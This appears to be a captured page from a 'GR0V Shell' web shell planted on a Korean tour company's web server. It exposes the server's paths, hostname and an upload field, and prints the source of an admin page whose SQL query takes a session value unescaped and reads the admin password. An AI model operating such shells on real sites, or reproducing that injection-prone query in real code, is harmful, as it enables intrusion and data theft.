? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html_bk/promice/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html_bk/promice/Main.php

<?
@session_start();
ob_start();
$useradmin = $_SESSION["useradmin"];
require_once "../include/tdate.php";
require_once "../include/connect.php";
require_once "../include/connectdb.php";

						  $sql="select * from useradmin where useradmin='$useradmin'";
						  $db_query=mysql_db_query($db,$sql);
						  $result=mysql_fetch_array($db_query);
						  $id=$result[id];
						  $adminname=$result[name];
						  $user_admin=$result[useradmin];
						  $pass_admin=$result[passadmin];
?>
<html>
<head>
<title><? echo "$headtxt"; ?></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<!-- Fireworks MX Dreamweaver MX target.  Created Sat Apr 02 10:29:23 GMT+0700 (SE Asia Standard Time) 2011-->
<link href="../css/style.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="<tinymce/tinymce.min.js"></script>
<script type="text/javascript">
tinymce.init({
    selector: "textarea"
 });
</script>

<!-- Place this in the body of the page content -->
<form method="post">
    <textarea></textarea>
</form>
</head>
<body bgcolor="#ffffff">
<div align="center"><strong> 
  </strong>
  <table width="89%" border="0" align="center" cellpadding="1" cellspacing="1">
    <tr> 
      <td><div align="center">
          <table width="903" border="0" cellspacing="1" cellpadding="1">
            <tr valign="top"> 
              <td width="490"><? echo "$headtxt | $e_date $etime"; ?><br> 
                <div align="left">หน้าปัจจุบันของคุณ 
                  : <a href="Main.php">หน้าหลัก</a> 
                </div></td>
              <td width="406"> 
                <div align="right">ยินดีต้อนรับคุณ 
                  <? echo "<u>$adminname</u>"; ?> เข้าใช้งานในระบบ<br>
                  [ <a href="ChangePass.php">เปลี่ยนรหัสผ่าน</a> 
                  ] <a href="logout.php">ออกจากระบบ</a> 
                </div></td>
            </tr>
          </table>
        </div></td>
</tr>
    <tr> 
      <td><div align="center"><strong>
          <? require_once "Menu.php"; ?>
          </strong></div></td>
    </tr>
    <tr>
      <td><div align="center"><br>
          <? echo "$buttomtxt"; ?> 
        </div></td>
    </tr>
  </table>
  
</div>
</body>
</html>

T1KUS90T
  root-grov@210.1.60.28:~$